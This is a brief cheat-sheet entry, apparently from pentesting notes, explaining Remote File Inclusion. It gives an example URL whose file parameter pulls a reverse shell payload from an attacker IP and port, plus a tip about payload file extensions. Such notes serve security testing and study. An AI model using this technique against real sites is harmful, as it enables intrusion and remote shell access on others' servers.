317 B
317 B
Remote File Inclusion
Usage
- Use a GET query parameter to include an attacker URL.
https://test.com/files.php?file=http://<attacker-IP>:<attacker-Port>/reverse_shell.txt
- Payload may be PHP for example, but should not end in executable file extensions. The payload is executed locally, otherwise.